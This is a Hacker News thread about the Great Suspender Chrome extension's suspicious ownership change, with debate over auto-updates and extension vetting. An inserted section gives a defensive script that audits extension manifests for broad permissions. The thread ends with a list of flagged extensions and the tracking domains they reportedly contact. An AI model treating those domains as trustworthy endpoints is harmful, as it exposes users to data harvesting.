| years, has VOIP caused international calls that used to
| cost $3 a minute to turn free and have video!
|
| The weird thing is that when A wants to connect with B you
| think there has to be a one-size-fits-all C that can block
| it.
| worik wrote:
| "Anarchy is simply absence of tall hierarchies"
|
| No it is not!
| ohgodplsno wrote:
| Ah, yes, the little project known as Debian completely
| failed and never took off. Anarchy is so bad. How could it
| ever produce anything of value, like say the world's most
| used Linux distribution?
| andrepd wrote:
| Yes, as we all know, open source software is a failed
| experiment, a cesspit of "anarchy".
| vlovich123 wrote:
| Not open source. Open source is a resounding success. The
| marketplace with the problems is advertising. We need to
| enact laws banning selling of third party data and make
| leaks a liability (perhaps even one that automatically
| pierces the normal corporate veil and opens VPs and up to
| personal liability if there was any circumvention
| initiated encouraged by them). Then businesses have to
| actually decide if the liability is worth it for them vs
| a free-for-all market that intelligence agencies and
| criminal enterprises are primarily funding.
| EGreg wrote:
| As well as science, language and other human endeavors.
| No one is in charge! I'm glad society advanced so much
| from secret alchemy cults with their "intellectual
| property" protections on their secrets.
| mixmastamyk wrote:
| That's a good description. A successful cesspit of
| anarchy.
| jbman223 wrote:
| Most open source software is neither decentralized nor
| publicly owned.
| TuringTest wrote:
| All of it is, otherwise it wouldn't meet the 4 freedoms
| that define open source.
|
| The 'project' maintaining the software may be
| centralized, but all its users "own" the software in the
| sense that they don't need to ask permission from the
| maintainer, and they can create their own modifications.
| hojjat12000 wrote:
| You're mixing a few different things. Free software and
| open source are different, and for each of them there are
| hundreds of different licenses that allow you to do one
| thing but not another.
| TuringTest wrote:
| Free software and open source are _different marketing
| strategies_ for the same concept. The most commonly
| understood meaning for both terms is the same, from the
| very moment the Open Source Initiative was created.
| gmiller123456 wrote:
| It seems you've misinterpreted the poster's intentions as if
| it should be illegal for a developer to do this. But he/she
| was merely informing users, and well-informed customers are a
| requirement for capitalism to work.
|
| The cost of using this extension is your information, and
| there are other products available that do the same thing at
| a lower cost. Based on the most fundamental concept of
| economics (supply and demand), "The Great Suspender" should
| fail as a product very quickly.
| djrogers wrote:
| > so I am not keen to do it again until I have more free time
|
| Aww man, I'm really sad to hear that RecipeFilter won't be
| coming to Safari anytime soon. I really got my hopes up after
| it was in the keynote!
|
| Since Apple distributes extensions in the App Store, have you
| thought about charging a buck or two for the Safari version? I
| know everyone says this, but I'd pay...
| kazinator wrote:
| > _what is your estimated price?_
|
| Say, $5 per active user; non-exclusive license: I can maintain
| my fork of the extension, and use any of the code in new
| projects.
| bombcar wrote:
| I feel there's a moneymaker here - create a popular open source
| extension, sell it off when you get a good deal, fork the code
| and let everyone find out the old version is "evil".
| twunde wrote:
| For those interested in understanding the security of Chrome
| extensions, duo introduced CRXcavator (https://crxcavator.io/) a
| while back, which does some risk scoring around permissions. It
| is chrome-only, and it doesn't protect against this type of
| attack specifically, although you can look at the Potential
| External Communication section for possible issues.
| mkj wrote:
| It seems auto-updating browser extensions are riskier than
| leaving them non-updated?
| netsharc wrote:
| It'll be a "great" day when someone manages to do big damage
| with code that Google hosted and delivered to the victims...
| IMO it's just a matter of time.
| SiteRelEnby wrote:
| Blindly letting _anything_ auto-update.
| AQXt wrote:
| ...which happens all the time in the free software world,
| when you type `apt-get|yum|brew update`.
|
| What are the odds of one dependency being taken over by a
| shady anonymous entity?
| mad182 wrote:
| Packages in the default repos for some large Linux distros
| are usually reviewed and tested by many people until they
| make it into updates for current stable version, so while
| it's probably not entirely impossible for some malicious
| code to get in, it seems pretty unlikely. Unlike browser
| extensions, where the current owner can upload anything
| they want and it's pushed to the users without them even
| knowing.
| AQXt wrote:
| How about `npm`, `pip`, `cpan`?...
|
| We have seen bad updates breaking the entire Javascript
| ecosystem, but they were not intentional.
|
| All it takes to inject a bad dependency is a burned out
| developer willing to delegate his free project to someone
| else...
| SiteRelEnby wrote:
| It's more the chance of an unexpected breaking change. When
| you use a package manager, you're _expecting_ stuff to
| change (and get to review what's changing).
|
| Upgrading manually regularly: Good idea.
|
| Having a cronjob to do it automatically without user
| intervention: Bad idea.
| Snarwin wrote:
| The fact that you have to manually type in `apt-get update`
| (or similar) means it's not automatic. You have full
| control over when the update takes place, and which
| packages get updated.
| spiffytech wrote:
| When discussing software updates, I feel like folks on HN
| commonly overestimate how much impact opportunity for
| controlling updates has. I haven't seen someone in my
| social/professional circles ever hesitate before applying
| an apt-get update. Nobody I've known checks changelogs
| (except developers checking on direct dependencies),
| nobody reads the patches for the updates to verify
| nothing malicious slipped in. "There's an update, I'd
| better apply it, unless it smells like a breaking
| change."
|
| So in practical terms, my experience is that vanishingly
| few people will behave differently than an auto-update
| system would behave, except in rare occasions like a
| malicious update making the headlines. We definitely need
| a solution for rejecting malicious updates, but I feel
| backing away from auto updates throws the baby out with
| the bathwater and would be a net-negative change for the
| industry and for users.
| traviscj wrote:
| There's also the occasional _necessity_ for making a
| breaking change, in particular _breaking some exploit_
| and thereby making the software more secure.
|
| I don't envy Chrome leadership's decision or having that
| problem to solve.
| shawnz wrote:
| I don't think the question is about control but rather
| whether automatic updates, when intentionally activated
| by the user, contribute more positively to the system's
| security than negatively.
|
| Without automatic updates, you might be more inclined to
| put off a patch which turns out to be urgent. Or you
| might be more likely to lose track of which patches have
| been applied across your various systems.
| spiffytech wrote:
| Auto-update is a mixed bag. We got into auto-update as a
| standard practice over the last decade because a large
| fraction of users never updated anything, so security issues
| would linger forever (not to mention ancient software
| versions holding back platform technologies, and financial
| concerns for software shops).
|
| So it's not that auto-update is flatly a bad idea, it's more
| that it's a trade-off that sometimes makes security issues
| almost evaporate, and sometimes makes them impossible to
| dodge.
| mkj wrote:
| I think the difference with browser extensions is the
| anonymity and speed of changing owners. There's more momentum
| to notice big companies going downhill (+- stuff like
| sourceforge)
| Anthony-G wrote:
| I recently had to install Certbot on a CentOS 8 server and
| discovered that the Certbot documentation recommends using Snap
| (for almost every popular GNU/Linux release). They have their
| reasons[1]. I figured it was time to investigate using Snap and
| the benefits it could provide.
|
| While researching, I found many users reporting that forced
| updates of software installed by Snap caused many problems and
| I decided against using it; I was able to install Certbot via a
| good old-fashioned RPM from EPEL.
|
| I also removed Snap from a different Ubuntu server which had
| recently been upgraded to 20.04 (I wasn't using LXD on that
| server so there was no need for it).
|
| 1. https://community.letsencrypt.org/t/how-to-install-
| certbot-w...
|
| FWIW, I've been allowing Apt and Yum package managers to
| automatically update for about 8 years without any problems.
| The only manual OS updating I do is for a set of physical (non-
| virtual) servers that are operational 24/7.
| nakodari wrote:
| Thanks for this! I've been using this extension for a long time
| and just removed it today. Honestly, with the MacBook Air M1 there is
| no need for suspending tabs any more because the battery life is
| amazing, so that also helps.
| weakboi wrote:
| Ironically, I tracked the real world identity of someone using
| stolen credit cards in my ecom site BECAUSE he posted a
| tutorial/how-to on YouTube showing the vulnerability tool (script
| kiddie), under his real name. SMH. This won't stop this
| information from being disseminated, but it may save some idiots
| from themselves.
| mendelmaleh wrote:
| I expected this to be about Jack Dorsey/twitter xD
| Androider wrote:
| In Chrome, make sure you set your less frequently used extensions
| to run "On click" instead of "On all sites". Extensions ->
| extension details -> Site access.
|
| For dev tools and such, I set a whitelist of the sites they're
| allowed to run on, using that same extension details page.
| There's no need for your JSON formatter etc. to run on every
| single page you visit. Also speeds up browsing.
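The two points above, twunde's note that CRXcavator scores extensions on their permissions and Androider's advice to restrict "Site access", are about the same property of an extension: how much of the web it is allowed to touch. As an added example (not code from the thread, from CRXcavator, or from any extension mentioned), here is a small static audit of an extension's manifest.json that flags blanket host access and a handful of data-exposing API permissions. The two manifests are constructed for illustration, and the list of "sensitive" permissions and "broad" host patterns is this example's own heuristic, not a Chrome rule.

```javascript
// Added example: static audit of a Chrome extension manifest for broad
// site access. Not from the HN thread, CRXcavator, or any real extension.

// Host patterns that grant access to every site (or every site on a scheme).
// Treating these as "broad" is this example's heuristic.
const BROAD_HOST_PATTERNS = new Set([
  "<all_urls>", "*://*/*", "http://*/*", "https://*/*", "file:///*",
]);

// API permissions whose misuse would expose browsing data or let the
// extension reach into other tabs. An assumption for the example; a real
// scorer would weight many more.
const SENSITIVE_PERMISSIONS = new Set([
  "webRequest", "webRequestBlocking", "cookies", "history", "tabs",
  "management", "nativeMessaging", "debugger",
]);

function isHostPattern(p) {
  return p === "<all_urls>" || /^(\*|https?|file|ftp):\/\//.test(p);
}

// Collects every host pattern the extension asks for, across the MV2 layout
// (host patterns mixed into "permissions") and the MV3 layout
// ("host_permissions"), plus the "matches" of any content scripts.
function collectHostPatterns(manifest) {
  const hosts = new Set();
  for (const p of manifest.permissions || []) if (isHostPattern(p)) hosts.add(p);
  for (const p of manifest.host_permissions || []) hosts.add(p);
  for (const cs of manifest.content_scripts || [])
    for (const m of cs.matches || []) hosts.add(m);
  return [...hosts];
}

function auditManifest(manifest) {
  const perms = manifest.permissions || [];
  const hosts = collectHostPatterns(manifest);
  const broadHosts = hosts.filter((h) => BROAD_HOST_PATTERNS.has(h));
  const sensitive = perms.filter((p) => SENSITIVE_PERMISSIONS.has(p));
  // "activeTab" is the least-privilege alternative: access only to the tab
  // the user invoked the extension on, granted per click.
  const usesActiveTab = perms.includes("activeTab");
  const findings = [];
  if (broadHosts.length)
    findings.push(`runs on all sites via ${broadHosts.join(", ")}`);
  for (const p of sensitive) findings.push(`sensitive permission: ${p}`);
  if (broadHosts.length && !usesActiveTab)
    findings.push("could use activeTab instead of blanket host access");
  return { broadHosts, sensitive, usesActiveTab, findings };
}

// Constructed manifests: a suspender-style extension with blanket access,
// and a formatter that only runs where the user clicks it.
const BROAD_MANIFEST = JSON.parse(`{
  "manifest_version": 3,
  "name": "example-suspender",
  "permissions": ["tabs", "storage", "alarms"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [{ "matches": ["*://*/*"], "js": ["inject.js"] }]
}`);

const SCOPED_MANIFEST = JSON.parse(`{
  "manifest_version": 3,
  "name": "example-json-formatter",
  "permissions": ["activeTab", "storage"],
  "host_permissions": ["https://api.example.com/*"]
}`);

for (const m of [BROAD_MANIFEST, SCOPED_MANIFEST]) {
  console.log(m.name, auditManifest(m).findings);
}
```

Running it prints three findings for the suspender-style manifest (blanket hosts, the `tabs` permission, and the missing `activeTab`) and none for the scoped formatter. The same check is what the "On click" site-access setting enforces from the user's side: an extension that only needs the current tab when invoked has no reason to hold `<all_urls>`.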
| brundolf wrote:
| Among other things, this is why when people say "HN doesn't need
| a dark mode, just use an extension", that isn't a valid solution.
| For years now I've refused to install any extensions that aren't
| too-big-to-compromise (which in practice - for me - means AdBlock
| Plus and maybe React Dev Tools), and that should be everyone's
| policy. Any extension whose compromise wouldn't damage the
| reputation of a billion-dollar organization is simply too juicy
| of an attack vector.
| raunakdag wrote:
| It's funny you mention AdBlock Plus but not uBlock Origin in
| this situation. I'd say the latter is much, much better than
| the former.
| brundolf wrote:
| But is it better _known_? That's the determining factor
| here. The Great Suspender was well-regarded in certain
| circles, and even fairly well-known (I've never used it but
| I've heard of it). But even it apparently wasn't above
| compromise. To be reasonably safe, an extension has to either
| be a) so well-known that they'd never be able to get away
| with silently adding malware (because someone would notice,
| which to be fair is what happened here), or b) tied to a
| major brand that wouldn't want to sell out to some shady
| firm, on PR grounds alone.
| bijant wrote:
| This is really Google's fault. They make it impossible to turn
| off automatic updates for Chrome extensions from their store.
| That would be kind-of-ok if they actually had a rigorous approval
| process. But they don't. The Chrome Web Store has become one of
| the prime vectors for malware. The only way to be safe is to
| exclusively download releases from the extension's GitHub repo and
| to manually install them.
| Kagerjay wrote:
| I never even patch automatic updates to my OS either (e.g. macOS
| Big Sur). I'd rather not guinea pig the latest updates and they
| usually don't add all that much value for chrome extension
| releases either, so a way to turn off automatic updates in
| chrome is highly desirable for me.
|
| Downloading and unpacking from GitHub is a PITA, I'd need to do
| this on each of my computers separately
| smt88 wrote:
| This is a terrible security practice.
|
| Switch to Chromium and use a package manager to stay up to
| date. Don't freeze updates, especially on your browser.
| sokoloff wrote:
| I work in software. I know the dangers of a day 0 exploit.
| I also know the dangers of an x.0 release of software.
|
| Security is often in tension with convenience/usability (as
| in this case).
|
| Concretely: I don't update to the latest MacOS day of
| release. I do update after a few weeks of "no significant
| issues reported" (or I'll update manually faster if I learn
| of a serious exploit). I still haven't updated to Big Sur as
| some of the software that I rely on doesn't work on Big Sur
| yet, so I'm on the latest patch of Catalina.
| jrochkind1 wrote:
| I'm not going to update to a new MacOS "named" release
| until it's been out for a while and probably has a patch
| release or two, agreed.
|
| But I install MacOS patch releases as soon as they are
| offered. It has never caused me a problem I am aware of,
| and I don't want to miss out on security patches, or even
| just bugfixes and perf improvements.
|
| Heck, I actually just upgraded a MacBook that was still
| on 10.12, which was EOL'd. But I upgraded it _because_ it
| was EOL'd, and wasn't getting patch releases for
| security fixes, and I want those patch releases as soon
| as they are released!
| smt88 wrote:
| You should let clients and users know that you care more
| about convenience than security so that they can make an
| informed decision about whether to trust their data with
| you.
|
| I don't know what x.0 software updates you're talking
| about (Chrome or Mac), but my comment never mentioned
| any. You don't seem to know that browser vendors don't
| really do those like OS vendors do. Either way, you can
| still avoid those while getting security updates.
|
| In my memory, there hasn't been a breaking auto-update in
| Chrome in years, but there have been hundreds of 0-days.
| The numbers don't really work out for the tradeoff you
| claim to be making.
| simias wrote:
| I don't think turning off automatic updates would be the right way
| to deal with this. See: Windows. If a piece of software becomes
| malware it needs to either be forked or retired completely,
| running unmaintained legacy versions of software is not
| sustainable.
|
| I have plenty of things I want to complain about when it comes
| to Google's user-adversity but mandatory automatic updates is
| definitely not one of them.
|
| If you're a technical user and really know (or really think
| that you know) what you're doing there are ways to effectively
| freeze a given version of an extension.
| [deleted]
| sn_master wrote:
| Or just add permissions and ask the user when the extension
| asks for new ones? e.g. permission to talk to the outside world
| that something like TGS shouldn't need to just do its job.
| LegitShady wrote:
| > The only way to be safe is to exclusively download releases
| from the extensions github repo and to manually install them.
|
| Or not use chrome
| metalliqaz wrote:
| The fact that Google has not addressed this gaping security
| hole in Chrome is borderline criminal.
| stevenhuang wrote:
| You can do better to voice your displeasure by not stretching
| credulity.
| metalliqaz wrote:
| It's hyperbole. Welcome to the Internet.
| AlexandrB wrote:
| In general, taking control away from users sets up all kind of
| bad incentives. For example, automatic updates with no way to
| downgrade save vendors from having to compete with their own
| older versions. This means regressions in functionality or
| design can be pushed out with little recourse for users other
| than complaining online. This is compounded by ecosystem lock-
| in and lack of data portability. The software industry as a
| whole is heading towards treating users more and more
| paternalistically.
| duxup wrote:
| On the other hand users are generally pretty poor at managing
| software themselves and as long as it works they'll happily
| and probably ignorantly run something that is not secure
| already and needs an update.
| CaptArmchair wrote:
| > users are generally pretty poor at managing software
|
| This is an assertion which begs many questions.
|
| Who are these users? What do you mean by "generally"? What
| do you mean by "poor"? What do you mean by "managing
| software"? Which software specifically? Why is "managing
| software" hard? What are specific cases where this might be
| true? Is this statement falsifiable?
|
| For instance, how does age, social background, education
| level, language, culture,... factor into the experience of
| "managing software"? Sure, the problem can't be software
| itself in its entirety?
|
| See, statements like these tend to break down once you
| start digging into the murky nuances and specificities of
| reality.
|
| Moreover, accepting them at face value tends to reinforce a
| belief which isn't based on fact: that the users of digital
| technology can't manage their devices, and therefore
| shouldn't be confronted with managing their devices.
|
| ... which is then translated and implemented in interfaces
| and systems that simply lack the functionality that gives
| users fine grained control over what is or isn't installed.
|
| Over a longer term, this promotes a form of "lazy thinking"
| in which users simply don't question what happens under the
| hood of their devices. Sure, people are aware of the many
| issues concerning privacy, personal data, security and so
| on. But ask them how they could make a meaningful change,
| and the answers will be limited to what's possible within
| the limitations of what the device offers.
|
| A great example of this would be people using a post-it to
| cover the camera in the laptop bezel.
|
| People don't know what happens inside their machine, they
| don't trust what happens on their machine, and there's no
| meaningful possibility to look under the hood and come to a
| proper understanding... so they revert to the next sensible
| thing they have: taping a post-it over the lens.
|
| The post-it doesn't solve the underlying issue - a lack of
| understanding which was cultivated - but it does solve a
| particular symptom: the inability to control what that
| camera does.
| strken wrote:
| I, and everyone else I know, do not install updates to
| our software in a timely manner unless we actively need a
| feature.
|
| Users are "I, and everyone else I know".
|
| Generally is "unless we need a feature".
|
| Poor is "do not install updates to our software".
|
| Managing software is "install updates".
|
| Software is any software we use that provides updates,
| which is all of it.
|
| Managing software is hard because doing it manually would
| require checking the website of every piece of software
| you've ever downloaded at regular intervals, where
| regular could be as frequently as minutes for security-
| critical tools.
|
| If I ever downgrade my software and lock it to a specific
| version, I am now managing it manually, and all of the
| above applies.
|
| I honestly don't think there are unquestioned assumptions
| here, because the task of keeping security-critical
| software up to date manually is nearly impossible for any
| user.
| devonbleak wrote:
| It really doesn't beg those questions - we have 25+ years
| of data backing it up. People across the board are bad
| about running updates. I'm guessing you missed the mid-
| late 90s when things like buffer overflows started to be
| exploited and firewalls became necessities because even
| the folks whose job it was to run updates of vulnerable
| systems with public IPs on the Internet... weren't. Then
| came the early 2000s and all the worms running amok
| because people still weren't running their updates. Then
| the collective web development industry screamed in pain
| because things like Windows XP and IE6 just would not
| die.
|
| The collective Internet has been through this before and
| (mostly) learned its lesson. People don't run updates
| when it's not shoved down their throat. And it's not a
| small segment of people. And it hasn't changed. Look at
| how many hacks still happen because of servers and apps
| that aren't patched for known vulnerabilities. Or the
| prevalence of cryptojacking which is still largely based
| on known vulnerabilities that already have patches
| available - indicating it's successful enough that people
| keep doing it.
|
| Most users don't question what happens under the hood of
| their devices because they don't care. They have other
| things to care about that actually mean something to them
| besides the nuances of the day to day maintenance of
| their devices. There does not exist an effective way of
| making people care about things like this, let alone
| educating the masses on how to appropriately choose which
| commit hash of their favorite browser extension they
| should really be on. How many security newsletters do you
| really expect the average person to be subscribed to in
| order to make informed decisions about these things?
|
| Hell my "Update" notification on Chrome is red this
| morning and I'm at least in the top 10% of security-
| conscious folks in the world (it's really not a high
| bar).
|
| I'm not saying automatic updates are without their
| problems - I'm in a thread on HN about that exact thing.
| But trying to claim it's somehow about sociodemographic
| issues and the answer is solving that and going back to
| selectively running updates is just ignoring the lessons
| of the past.
| duxup wrote:
| I honestly am not at all sure what you mean by much of
| that.
|
| Demographics don't change the fact that if you don't
| automatically update software, many users simply won't.
| That's bad.
| jjkaczor wrote:
| ... in the usual pedantry of HN your use of "poor" was
| interpreted to mean socio-economic, rather than... "just
| bad at something"...
| duxup wrote:
| Oh I see. That's weird, but thanks for letting me know.
| Someone wrote:
| I don't see how one could parse _"On the other hand users
| are generally pretty poor at managing software
| themselves"_ and assign that interpretation to _"poor"_.
| duxup wrote:
| I agree, but the user who responded to me seemed to talk
| about demographics as if I had meant "poor" as in not
| having much money.
|
| The internet is global, sometimes I think things get lost
| in translation.
| wolco5 wrote:
| That would cover users who are poor at managing software.
| Being able to turn them off would require someone to be
| good at managing software. Why remove control from those
| users?
| duxup wrote:
| I want to think that folks who would choose that option
| would be responsible, but the amount I hear from other
| developers who defer updates on Windows 10 to the maximum
| (1 year...) and still are upset when they have to reboot
| makes me think that even experienced users present a
| risk.
| ziml77 wrote:
| I don't _want_ to be saying that we should remove
| control, but I actually do think it's reasonable to.
| Even on a single-user device, security issues are not
| isolated. An infected machine will likely be used for
| things like spam and DDOS.
|
| If you make something available for people to toggle that
| improves their experience, people are going to take
| advantage of that even if they don't really grasp or
| decide to ignore the consequences. In the case of updates
| the improved experience is not being nagged or forced to
| restart an application or the whole OS. And unfortunately
| the only way to really gatekeep that control to people
| who know what they're doing is giving it enterprise
| pricing.
| iamben wrote:
| Conversely, before automatic updates web developers were
| stuck supporting Internet Explorer for the best part of
| twenty years. Many of the people using it had neither reason
| nor knowledge to update it, and it became the reason my
| parents' computers got riddled with malware.
|
| There's a sensible middle ground here. Take the paternalistic
| approach that (generally) protects people like my mum. Add
| settings that allow people like you and me to turn off
| updates or roll backwards. Push the people controlling the
| updates (like the Chrome store) to better protect their
| users.
| marcosdumay wrote:
| Internet Explorer was only replaced by automatic updates
| _after_ its usage fell enough that sites stopped supporting
| it.
| ryandrake wrote:
| Users need to be motivated to upgrade. If their current
| software works sufficiently on the sites they care about,
| then they have no need to upgrade. If the sites themselves
| are enabling this behavior, by bending over backwards to
| work with old browsers, then they are part of the
| "problem".
|
| I don't like automatic updates and generally keep them
| disabled. Software upgrades tend to reduce functionality
| and instead force unnecessary UX redesigns on users, so I'd
| rather avoid them. I _wish_ developers had the [EDIT:
| incentive] to release security patches independently from
| functionality changes, but few do that anymore, sadly.
| ComodoHacker wrote:
| >I wish developers had the competence to release security
| patches independently from functionality changes, but few
| do that anymore, sadly.
|
| You do realize it's not competence developers are
| lacking, it's resources that are finite, don't you?
| iamben wrote:
| It's been an age since I've worked in an agency, but back
| in the IE era, at least once a month a dev would ask to
| use a 'modern feature'. Something to support some new
| piece of design from the design team, or save hours or
| days of dev, or remove the need for hacky 'fixes' that
| could be done cleanly with modern browser support.
|
| So off to analytics they would go. "X thousand users are
| using IE8. We're converting at X%. Removing support for
| IE8 just means these people will shop elsewhere and we'll
| lose X thousand pounds a month. You need to support IE8."
|
| Believe me, I wish it was as simple as saying developers
| are "part of the problem," because it would be an easy
| fix. But try selling that (without a huuuuge struggle!)
| to the person who holds the purse strings.
|
| Sadly the new features usually only came on new sites.
| It's much easier to push it through when you're not
| cutting off an existing income stream.
| corty wrote:
| Despite automatic updates, web developers are still stuck
| with Safari, IE, old android browsers and old edge.
| Automation doesn't help with bugs and functionality if
| there are just no updates to be installed that fix bugs and
| bring new functionality.
| username90 wrote:
| The major problem with Internet Explorer was that it was
| impossible to update without updating Windows which costs
| money so most people and organizations didn't do it.
| mikewarot wrote:
| >Conversely, before automatic updates web developers were
| stuck supporting Internet Explorer for the best part of
| twenty years. Many of the people using it had neither
| reason nor knowledge to update it, and it became the reason
| my parents' computers got riddled with malware.
|
| The failure is not that of Internet Explorer, but rather
| the OS in which it runs, which has a faulty security model.
| No operating system should trust executables with
| everything by default.
| Spivak wrote:
| It wasn't faulty at the time since people were more
| concerned about protecting computers from users than
| protecting users from applications.
|
| We all seem to forget that computing has changed
| _drastically_ in the last decade.
| ColonelPhantom wrote:
| I would say that "protecting users from applications" (or
| at least, external attackers) has been commonplace for
| maybe even two decades now, ever since major malware
| 'plagues' of the early 2000's (pre-SP2 Windows XP) like
| Blaster or Sasser.
|
| That said, in that era it was often assumed (more so than
| now) that software the user installed himself is trusted.
| Cthulhu_ wrote:
| I don't mind automatic updates per se as long as they're
| thoroughly checked and vetted. I'm not convinced Android and
| the Chrome web store do ANY checking / vetting. I have more
| trust in Apple's stores.
|
| Vetting could be better with a lot of companies as well;
| remember not so long ago when Windows Defender decided a
| critical system file was malware and broke a ton of systems?
|
| Verification. Vetting. Gradual release. Automatically disable
| extensions if they changed ownership, or if there's
| suspicious activity on the account of the owner (e.g. new
| login in another country).
|
| And they need to take a MUCH harder stance on malware. Right
| now they're not even acknowledging there's a problem, let
| alone acting on it.
| londons_explore wrote:
| For any extension that makes any money, the solution is a
| deposit scheme.
|
| "Google will withhold $1 per user of your ad revenue
| forever. If your extension is found to contain malware, you
| forfeit all the $1's. Decisions on malware'y ness shall be
| made by XYZ malware researchers."
|
| Allow a developer to get back their $1 when a user
| uninstalls the extension, or the developer stops making the
| extension. Also give the developer a certificate anytime
| showing how many $1's you hold of theirs (they could use
| that to get a loan from someone willing to trust them not
| to distribute malware).
| PetahNZ wrote:
| Not really a solution, just the minimum price a buyer
| would need to pay.
| londons_explore wrote:
| True. But even the most profitable malware won't want to
| forfeit hundreds of millions of dollars for a popular
| chrome extension.
| jrochkind1 wrote:
| Users never upgrading their software certainly also leads to
| security problems though, it's not a solution, and it is
| reasonable to try to set things up so this doesn't happen.
| ThisIsTheWay wrote:
| Wouldn't an easy solution be to turn auto updates on by
| default, and warn users that turn it off that they are
| opening themselves up to potential security issues, and to do
| so wisely?
| velosol wrote:
| The issue comes when an auto update regresses something
| that the user relied upon. As long as the automatic update
| has a 'downgrade' option that's tenable but most of the
| solutions out there make downgrading difficult.
|
| I prefer automatic updates that are presented to the user
| for action, sadly feature update/release notes are often
| hidden or content-free (cf. Google's apps' updates on the
| Play Store) and downgrading path varies heavily with OS
| (easy on Linux, impossible on iOS).
| Paul-ish wrote:
| I keep most of my extensions disabled most of the time. A lot of
| the extensions have particular uses and don't always need to be
| active.
| imedadel wrote:
| I recently switched to Auto Tab Discard.[1] It uses the browser's
| built-in tab suspending. It doesn't have all the features of TGS,
| though.
|
| Edit: OneTab[2] is also pretty good when you have lots of tabs
| open for research or work.
|
| [1]: https://github.com/rNeomy/auto-tab-discard
|
| [2]: https://www.one-tab.com/
| anotheryou wrote:
| perfect! I was looking for [1] the other day. Plays nicely with
| Sidebery which uses the same api but can't do "unload all
| other tabs".
| Debug_Overload wrote:
| I've been using it for the last few weeks, and it's been pretty
| good so far. It doesn't suspend music tabs when they're not
| playing (which TGS did automatically), but nothing much to
| complain about.
| ext_dev wrote:
| Was once approached by a company who had software that would
| allow me to install affiliate links on Google Search results by
| installing a third party on my extension.
|
| Had about 50k active users at the time and was making around
| EUR1.8k a month.[1] To be honest, users were informed on the
| install flow and most people didn't care what I was doing.
| Probably how Hola unblocker still has 8M.
|
| Google understandably told me to remove it.
|
| Donations inside extensions offer near nothing. Doesn't feel like
| an extension that can offer a paid tier.
|
| It's a dirty but effective way to generate an income stream
| relatively quickly. Even more so, if you wash your hands from it
| and walk away.
|
| I'm surprised Google hasn't taken it down completely, as it
| breaks the single use policy.
|
| [1] https://i.imgur.com/M4CD9CB.png
| SiteRelEnby wrote:
| Either the second or third time it lost all my tabs was when I
| stopped trusting it.
| frob wrote:
| Google Chrome now has tab grouping. In Beta, you can click on the
| group name and collapse the tabs. Based on their reload times, it
| seems chrome suspends the tabs in the background when you
| collapse the group.
| katsura wrote:
| Oh, this is awesome. I'm on Linux so I've been using Chromium,
| where this is already available. Pretty neat.
|
| Edit: looks like it works in Chrome as well.
| nottheonion wrote:
| This looks promising. To activate the suspend on collapse
| feature enter "chrome://flags/" into the address bar and make
| sure these experimental features are "enabled": #tab-groups,
| #tab-groups-collapse, #tab-groups-collapse-freezing. I also
| enabled: #tab-groups-auto-create.
| EGreg wrote:
| And this is why we need to rethink how we do software
| distribution.
|
| Package managers are nice for the lazy, but then we get stuff
| like this:
|
| https://qz.com/646467/how-one-programmer-broke-the-internet-...
|
| Actually you might be pulling a bunch of malicious updates in 2-3
| modules deep in your dependency tree anytime.
|
| As a society we should be moving away from a culture of
| "immediate" updates eg on Twitter etc. And go towards more "peer
| review" like in science. Otherwise we are putting responsibility
| on every individual to verify all sides of the story and get
| informed. They don't and society gets more and more divided.
| Imagine if a scientist tweeted at 3am and half their followers
| instantly believed them. Or if an open source contributor's pull
| request was instantly accepted and pulled overnight by everyone.
| That's why USA and other countries are now so divided
| politically. Individual responsibility of 100% of the downstream
| nodes is strange to outsource responsibility to.
|
| I wrote about this back in 2012 predicting what would happen:
|
| https://magarshak.com/blog/?p=114
| Mediterraneo10 wrote:
| Recently I wanted to build one of Signal's libraries so that I
| could use it with signal-cli. It astonished me that building
| this secure messenger requires automatically downloading a
| whole host of third-party dependencies through wget from some
| disparate repositories, which presumably had received little
| vetting.
|
| What happened to the notion of using stable, centralized
| package repositories like Debian's or Red Hat's in order to
| build one's software? I did a lot of Free Software development
| in the early millennium, then was away from the scene for a few
| years, and when I came back this desire for convenience above
| all else really baffles me.
| EGreg wrote:
| At Qbix, we have built everything in-house and the few
| dependencies that we do pull in, we vetted and pinned the
| versions. People have criticized us for that in the past but
| if we are ever to get past trusting large, centralized
| entities for our server back ends, we need to make sure to
| kick the open source movement to the next level:
|
| https://qbix.com/blog/2021/01/15/open-source-communities/
|
| https://qbix.com/blog/2018/01/17/modern-security-practices-f...
| specialist wrote:
| Thanks for sharing.
|
| I'm now framing the problem as "inauthentic speech".
|
| > _...go towards more "peer review" like in science._
|
| Ditto journalism and reporting.
|
| This is a universal problem. The core solution remains the
| same.
|
| Cite your sources.
|
| Show your work.
|
| Sign your name.
|
| WRT John Walker's screed, I really thought certificates and web
| of trust would have become the norm by now. Anything unsigned
| would be treated as gossip or worse. Certs could be revoked as
| needed.
|
| Further, every trusted digital relationship would start with a
| key exchange. Vs relying on username and password. E.g. banks
| would issue me a Secure Enclave of some sort, like a USB fob.
|
| I'd like to understand why this didn't happen. My best guess is
| "Worse is better" enabled predators and parasites. Which has
| been acceptable during the gold rush.
| tus88 wrote:
| "Shady" take-over of plugins/apps is just as big a suspicious fail
| as allowing apps to gain access to all contacts on mobile phones.
|
| Google never really cared about user privacy at all.
| cwwc wrote:
| Lifesaver. Much obliged, davidfstr.
| facorreia wrote:
| That's why I don't trust Chrome extensions. There have been too
| many instances of a popular instance being taken over to run
| malware. I don't think Google's handling of these security issues
| has been adequate.
| AlexCoventry wrote:
| Is there a tool which will automatically reload _all_ your
| extensions from disk, as described in the OP? Seems like a
| sensible default, from a security perspective.
| nojito wrote:
| Sleeping Tabs is a feature on MS Edge.
|
| https://www.windowscentral.com/microsoft-edge-canary-can-put...
| bugfix wrote:
| Wow, my Chrome RAM usage went from about 2GB to 8GB after
| removing TGS.
| aitchnyu wrote:
| Why didn't browsers start warning users when an extension updated
| after changing owners?
| davidfstr wrote:
| <nope>The owner in the extension metadata on The Great
| Suspender hasn't been updated (to my understanding) so the
| Chrome Web Store doesn't even know that the owner has been
| changed.</nope>
|
| Actually it does appear that the owner was changed from
| "deanoemcke" to "thegreatsuspender" (the new mystery owner) on
| the Chrome Web Store page.
|
| I agree that warning when updating an extension if the stated
| owner has changed would be valuable.
| kburman wrote:
| Here's a list of other extensions which have been recently flagged
| by the community for similar behaviour
|
| - Auto Refresh Premium, static.trckljanalytic.com
|
| - Stream Video Downloader, static.trckpath.com
|
| - Custom Feed for Facebook, api.trackized.com
|
| - Notifications for Instagram, pc.findanalytic.com
|
| - Flash Video Downloader, static.trackivation.com
|
